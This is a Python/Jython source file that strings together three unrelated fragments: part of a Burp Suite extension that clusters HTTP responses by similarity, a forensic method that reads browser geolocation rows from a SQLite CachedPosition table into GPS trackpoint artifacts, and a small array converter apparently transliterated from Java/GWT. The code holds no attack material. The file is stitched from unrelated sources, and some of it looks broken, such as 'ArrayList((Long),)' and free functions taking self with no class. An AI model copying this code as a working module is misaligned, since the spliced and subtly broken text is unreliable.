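    separator = '----------------'
    print(separator)
    for field in (self._postGet, self._userAgent, self._requestUrl,
                  self._requestBody, self._requestData, self._requestDataGet,
                  self._httpService, self._dataDict, self._dataLen,
                  self._attr):
        print(field)
        print(separator)


''' printResponse '''


def printResponse(self):
    """Print the response fields to stdout, one per line, between separators."""
    separator = '----------------'
    print(separator)
    for field in (self._responseBody, self._responseMessage,
                  self._responseLength):
        print(field)
        print(separator)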
def registerExtenderCallbacks(self, callbacks):
    """Set up the extension: UI, option defaults, stored log entries, listeners.

    Called with Burp's callbacks object. Builds the three tabs (cluster
    summary, options, about), sets the default clustering options, replays
    log entries returned by load_project_setting("log_entries"), and only
    then registers the tab and the HTTP listener.
    """
    # keep a reference to our callbacks object
    self._callbacks = callbacks
    # obtain an extension helpers object
    self._helpers = callbacks.getHelpers()
    # set our extension name
    callbacks.setExtensionName("Response Clusterer")
    # create the log and a lock on which to synchronize when adding log entries
    self._log = ArrayList()
    self._lock = Lock()
    # main tabbed pane
    self._main_jtabedpane = JTabbedPane()
    # The split pane with the log and request/response details
    self._splitpane = JSplitPane(JSplitPane.VERTICAL_SPLIT)
    # table of log entries
    logTable = Table(self)
    scrollPane = JScrollPane(logTable)
    self._splitpane.setLeftComponent(scrollPane)
    # List of log entries
    self._log_entries = []
    # tabs with request/response viewers (both created non-editable)
    tabs = JTabbedPane()
    self._requestViewer = callbacks.createMessageEditor(self, False)
    self._responseViewer = callbacks.createMessageEditor(self, False)
    tabs.addTab("Request", self._requestViewer.getComponent())
    tabs.addTab("Response", self._responseViewer.getComponent())
    self._splitpane.setRightComponent(tabs)
    # Set up the options panel: one label/field pair per grid row. `self` is
    # registered as the document/action listener for each input.
    self._optionsJPanel = JPanel()
    gridBagLayout = GridBagLayout()
    gbc = GridBagConstraints()
    self._optionsJPanel.setLayout(gridBagLayout)
    # Option: upper bound on the number of clusters kept
    self.max_clusters = 500
    self.JLabel_max_clusters = JLabel("Maximum amount of clusters: ")
    gbc.gridy = 0
    gbc.gridx = 0
    self._optionsJPanel.add(self.JLabel_max_clusters, gbc)
    self.JTextField_max_clusters = JTextField(str(self.max_clusters), 5)
    self.JTextField_max_clusters.getDocument().addDocumentListener(self)
    gbc.gridx = 1
    self._optionsJPanel.add(self.JTextField_max_clusters, gbc)
    callbacks.customizeUiComponent(self.JLabel_max_clusters)
    callbacks.customizeUiComponent(self.JTextField_max_clusters)
    # Option: similarity threshold (label states the range 0..1)
    self.similarity = 0.95
    self.JLabel_similarity = JLabel("Similarity (between 0 and 1)")
    gbc.gridy = 1
    gbc.gridx = 0
    self._optionsJPanel.add(self.JLabel_similarity, gbc)
    self.JTextField_similarity = JTextField(str(self.similarity), 5)
    self.JTextField_similarity.getDocument().addDocumentListener(self)
    gbc.gridx = 1
    self._optionsJPanel.add(self.JTextField_similarity, gbc)
    callbacks.customizeUiComponent(self.JLabel_similarity)
    callbacks.customizeUiComponent(self.JTextField_similarity)
    # Option: which similarity method to use (off by default)
    self.use_quick_similar = False
    self.JLabel_use_quick_similar = JLabel(
        "Use set intersection of space splitted tokens for similarity (default: optimized difflib.SequenceMatcher.quick_ratio)"
    )
    gbc.gridy = 2
    gbc.gridx = 0
    self._optionsJPanel.add(self.JLabel_use_quick_similar, gbc)
    self.JCheckBox_use_quick_similar = JCheckBox("")
    self.JCheckBox_use_quick_similar.addActionListener(self)
    gbc.gridx = 1
    self._optionsJPanel.add(self.JCheckBox_use_quick_similar, gbc)
    callbacks.customizeUiComponent(self.JCheckBox_use_quick_similar)
    # Option: response size limit in bytes
    self.response_max_size = 10 * 1024  # 10 KiB
    self.JLabel_response_max_size = JLabel("Response max size (bytes)")
    gbc.gridy = 3
    gbc.gridx = 0
    self._optionsJPanel.add(self.JLabel_response_max_size, gbc)
    self.JTextField_response_max_size = JTextField(
        str(self.response_max_size), 5)
    self.JTextField_response_max_size.getDocument().addDocumentListener(
        self)
    gbc.gridx = 1
    self._optionsJPanel.add(self.JTextField_response_max_size, gbc)
    callbacks.customizeUiComponent(self.JLabel_response_max_size)
    callbacks.customizeUiComponent(self.JTextField_response_max_size)
    # Filter lists; where they are applied is outside this method.
    # ('GIF' appears twice in the MIME tuple.)
    self.uninteresting_mime_types = ('JPEG', 'CSS', 'GIF', 'script', 'GIF',
                                     'PNG', 'image')
    self.uninteresting_status_codes = ()
    self.uninteresting_url_file_extensions = ('js', 'css', 'zip', 'war',
                                              'jar', 'doc', 'docx', 'xls',
                                              'xlsx', 'pdf', 'exe', 'dll',
                                              'png', 'jpeg', 'jpg', 'bmp',
                                              'tif', 'tiff', 'gif', 'webp',
                                              'm3u', 'mp4', 'm4a', 'ogg',
                                              'aac', 'flac', 'mp3', 'wav',
                                              'avi', 'mov', 'mpeg', 'wmv',
                                              'swf', 'woff', 'woff2')
    # Static HTML for the "About & README" tab
    about = "<html>"
    about += "Author: floyd, @floyd_ch, http://www.floyd.ch<br>"
    about += "modzero AG, http://www.modzero.ch<br>"
    about += "<br>"
    about += "<h3>Getting an overview of the tested website</h3>"
    about += "<p style=\"width:500px\">"
    about += "This plugin clusters all response bodies by similarity and shows a summary, one request/response per cluster. "
    about += 'Adjust similarity in the options if you get too few or too many entries in the "One member of each cluster" '
    about += "tab. The plugin will allow a tester to get an overview of the tested website's responses from all tools (scanner, proxy, etc.). "
    about += "As similarity comparison "
    about += "can use a lot of ressources, only small, in-scope responses that have interesting response codes, "
    about += "file extensions and mime types are processed. "
    about += "</p>"
    about += "</html>"
    self.JLabel_about = JLabel(about)
    self.JLabel_about.setLayout(GridBagLayout())
    self._aboutJPanel = JScrollPane(self.JLabel_about)
    # customize our UI components
    callbacks.customizeUiComponent(self._splitpane)
    callbacks.customizeUiComponent(logTable)
    callbacks.customizeUiComponent(scrollPane)
    callbacks.customizeUiComponent(tabs)
    # add the splitpane and options to the main jtabedpane
    self._main_jtabedpane.addTab("One member of each cluster", None,
                                 self._splitpane, None)
    self._main_jtabedpane.addTab("Options", None, self._optionsJPanel, None)
    self._main_jtabedpane.addTab("About & README", None, self._aboutJPanel,
                                 None)
    # clusters will grow up to self.max_clusters response bodies...
    self._clusters = set()
    self.Similarity = Similarity()
    # Now load the already stored log entries
    # NOTE(review): load_project_setting is defined outside this view. The
    # entries come from saved project data, so the storage format decides how
    # far a project file has to be trusted; confirm it is a data-only format.
    with self._lock:
        log_entries_from_storage = self.load_project_setting("log_entries")
        if log_entries_from_storage:
            for toolFlag, req, resp, url in log_entries_from_storage:
                try:
                    self.add_new_log_entry(toolFlag, req, resp, url)
                except Exception as e:
                    # A bad stored entry is reported and skipped; the rest
                    # are still loaded.
                    print "Exception when deserializing a stored log entry", toolFlag, url
                    print e
    # Important: Do this at the very end (otherwise we could run into troubles locking up entire threads)
    # add the custom tab to Burp's UI
    callbacks.addSuiteTab(self)
    # register ourselves as an HTTP listener
    callbacks.registerHttpListener(self)
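def __findGeoLocationsInDB(self, databasePath, abstractFile):
    """Post one GPS trackpoint artifact per row of the CachedPosition table.

    Opens the SQLite file at databasePath through JDBC, reads timestamp,
    latitude and longitude from every CachedPosition row, attaches them to a
    new TSK_GPS_TRACKPOINT artifact on abstractFile and indexes the artifact
    for keyword search. Returns None in every case; a falsy databasePath is
    a no-op.

    Failures to connect or to run the query are deliberately silent (not
    every candidate database has this table). The result set, statement and
    connection are closed on every path.
    """
    if not databasePath:
        return

    connection = None
    statement = None
    resultSet = None
    try:
        try:
            Class.forName("org.sqlite.JDBC")  # load JDBC driver
            connection = DriverManager.getConnection("jdbc:sqlite:" +
                                                     databasePath)
            statement = connection.createStatement()
        except (ClassNotFoundException) as ex:
            self._logger.log(Level.SEVERE, "Error loading JDBC driver", ex)
            self._logger.log(Level.SEVERE, traceback.format_exc())
            return
        except (SQLException) as ex:
            # Error connecting to SQL database. The outer finally still
            # closes the connection if it was opened before the failure.
            return

        try:
            resultSet = statement.executeQuery(
                "SELECT timestamp, latitude, longitude, accuracy FROM CachedPosition;"
            )
            while resultSet.next():
                # NOTE(review): a value that Long.valueOf / Double.valueOf
                # cannot parse raises inside this loop and is handled by the
                # generic handler below, so the remaining rows are skipped.
                # Stored timestamp is divided by 1000 (presumably ms -> s;
                # confirm against the schema).
                timestamp = Long.valueOf(
                    resultSet.getString("timestamp")) / 1000
                latitude = Double.valueOf(resultSet.getString("latitude"))
                longitude = Double.valueOf(resultSet.getString("longitude"))

                attributes = ArrayList()
                artifact = abstractFile.newArtifact(
                    BlackboardArtifact.ARTIFACT_TYPE.TSK_GPS_TRACKPOINT)
                attributes.add(
                    BlackboardAttribute(
                        BlackboardAttribute.ATTRIBUTE_TYPE.TSK_GEO_LATITUDE,
                        general.MODULE_NAME, latitude))
                attributes.add(
                    BlackboardAttribute(
                        BlackboardAttribute.ATTRIBUTE_TYPE.TSK_GEO_LONGITUDE,
                        general.MODULE_NAME, longitude))
                attributes.add(
                    BlackboardAttribute(
                        BlackboardAttribute.ATTRIBUTE_TYPE.TSK_DATETIME,
                        general.MODULE_NAME, timestamp))
                attributes.add(
                    BlackboardAttribute(
                        BlackboardAttribute.ATTRIBUTE_TYPE.TSK_PROG_NAME,
                        general.MODULE_NAME, "Browser Location History"))
                # The accuracy column is selected but not stored:
                # artifact.addAttribute(BlackboardAttribute(BlackboardAttribute.ATTRIBUTE_TYPE.TSK_VALUE.getTypeID(),moduleName, accuracy))
                # NOTE: originally commented out

                artifact.addAttributes(attributes)
                try:
                    # index the artifact for keyword search
                    blackboard = Case.getCurrentCase().getServices(
                    ).getBlackboard()
                    blackboard.indexArtifact(artifact)
                except Blackboard.BlackboardException as ex:
                    # Indexing failure is reported but does not stop the
                    # loop; the artifact itself has already been created.
                    self._logger.log(
                        Level.SEVERE, "Unable to index blackboard artifact " +
                        str(artifact.getArtifactTypeName()), ex)
                    self._logger.log(Level.SEVERE, traceback.format_exc())
                    MessageNotifyUtil.Notify.error(
                        "Failed to index GPS trackpoint artifact for keyword search.",
                        artifact.getDisplayName())
        except SQLException as ex:
            # Unable to execute browser location SQL query against database.
            pass
        except Exception as ex:
            self._logger.log(Level.SEVERE,
                             "Error putting artifacts to blackboard", ex)
            self._logger.log(Level.SEVERE, traceback.format_exc())
    finally:
        # Close each handle on its own so that one failing close() cannot
        # leave the others open.
        for handle in (resultSet, statement, connection):
            if handle is None:
                continue
            try:
                handle.close()
            except Exception as ex:
                # Error closing database.
                pass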
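def convertStringArray(self, jsArray):
    """Convert the elements of jsArray to Long values and return the list.

    Conversion stops at the first element that raises; the failure is
    logged through GWT.log and the values converted so far are returned.
    """
    # NOTE(review): the constructor argument is kept exactly as found; it
    # looks like a leftover of a generic type parameter. Confirm that
    # ArrayList accepts it in this runtime.
    result = ArrayList((Long),)
    try:
        for i in range(0, jsArray.__len__()):
            result.add(Long(jsArray.get(i)))
    except Exception as e:
        GWT.log(u"Failed to convert String array ", e)
    # The visible original built `result` but never returned it, so callers
    # always received None.
    return result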